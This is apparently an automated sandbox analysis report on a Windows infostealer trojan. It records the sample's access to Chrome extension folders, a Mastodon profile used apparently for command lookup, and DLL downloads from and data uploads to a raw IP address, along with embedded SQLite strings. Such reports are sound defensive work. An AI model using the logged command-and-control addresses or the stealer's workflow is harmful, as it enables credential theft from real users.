Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdbX source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000005.00000003.273425957.00000000049C1000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.303970466.0000000004971000.00000004.00000001.sdmp, WerFault.exe, 00000012.00000003.333599368.0000000004DA1000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.361366430.0000000004C31000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.403776159.00000000054D1000.00000004.00000001.sdmp, WerFault.exe, 00000020.00000003.474552945.00000000049A1000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.515524165.0000000005301000.00000004.00000001.sdmp
Source: Binary string: OneCoreUAPCommonProxyStub.pdb<@ source: WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp
Source: Binary string: combase.pdbb source: WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb{ source: WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: comctl32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.404017061.00000000055C8000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474855541.000000000504A000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515869897.000000000546A000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000005.00000003.273447115.0000000004B98000.00000004.00000040.sdmp, WerFault.exe, 0000000B.00000003.304056829.0000000004B08000.00000004.00000040.sdmp, WerFault.exe, 00000012.00000003.333656380.0000000002DA8000.00000004.00000040.sdmp, WerFault.exe, 00000015.00000003.361412743.0000000004C08000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.403630655.00000000055CC000.00000004.00000040.sdmp, WerFault.exe, 00000020.00000003.474377331.000000000504E000.00000004.00000040.sdmp, WerFault.exe, 00000025.00000003.515345814.000000000546E000.00000004.00000040.sdmp
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior

Networking:

barindex
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic HTTP traffic detected: POST /1013 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 109272Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 88.99.75.82 88.99.75.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:01 GMTContent-Type: application/x-msdos-programContent-Length: 334288Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "519d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:01 GMTContent-Type: application/x-msdos-programContent-Length: 137168Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "217d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:01 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:01 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:01 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:02 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:02 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 16:35:02 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Tue, 28 Sep 2021 16:35:02 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytes
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 23.88.105.196
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/1013
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/GN46WT4N9GWA0LWA3Ur
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/freebl3.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/freebl3.dllQu
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dll4
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dll=u
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dllgGu
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/mozglue.dllyuG
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/msvcp140.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/msvcp140.dllQ)G
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/msvcp140.dllb3
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/msvcp140.dllu
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/nss3.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/softokn3.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/softokn3.dll196/freebl3.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/vcruntime140.dll
Source: cYKFZFK0Rg.exe, 00000001.00000003.427737262.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/vcruntime140.dllgc
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://23.88.105.196/vcruntime140.dll~p
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://crl.m&
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: cYKFZFK0Rg.exe, 00000001.00000003.428472496.0000000000654000.00000004.00000001.sdmp String found in binary or memory: http://microsoft.co
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ocsp.thawte.com0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue[1].dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: http://www.mozilla.com0
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtabSQLite
Source: temp.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://mas.to
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://mas.to/.well-known/webfinger?resource=acct%3Akillern0%40mas.to
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://mas.to/users/killern0
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://mas.to;
Source: cYKFZFK0Rg.exe, 00000001.00000003.421103897.0000000000658000.00000004.00000001.sdmp String found in binary or memory: https://media.mas.to
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: cYKFZFK0Rg.exe, 00000001.00000003.428414029.0000000003AF1000.00000004.00000001.sdmp, temp.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /1013 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 23.88.105.196Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: unknown DNS traffic detected: queries for: mas.to
Source: global traffic HTTP traffic detected: GET /@killern0 HTTP/1.1Host: mas.to
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 23.88.105.196Connection: Keep-Alive
Source: unknown HTTPS traffic detected: 88.99.75.82:443 -> 192.168.2.7:49742 version: TLS 1.2

System Summary:

Uses 32bit PE files
Source: cYKFZFK0Rg.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
One or more processes crash
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 868
Sample file is different than original file name gathered from version info
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs cYKFZFK0Rg.exe
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs cYKFZFK0Rg.exe
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenss3.dll8 vs cYKFZFK0Rg.exe
Source: cYKFZFK0Rg.exe, 00000001.00000003.426600931.000000000375B000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs cYKFZFK0Rg.exe
PE file contains strange resources
Source: cYKFZFK0Rg.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: cYKFZFK0Rg.exe Virustotal: Detection: 25%
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\cYKFZFK0Rg.exe 'C:\Users\user\Desktop\cYKFZFK0Rg.exe'
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 868
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 888
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 896
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 1104
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 1516
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 2028
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 2036
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 2052
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERA894.tmp
Source: classification engine Classification label: mal100.troj.spyw.winEXE@9/44@1/2
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, nss3[1].dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: cYKFZFK0Rg.exe, 00000001.00000000.310964410.0000000000400000.00000040.00020000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: cYKFZFK0Rg.exe, 00000001.00000000.443368879.0000000003C42000.00000004.00000001.sdmp, softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
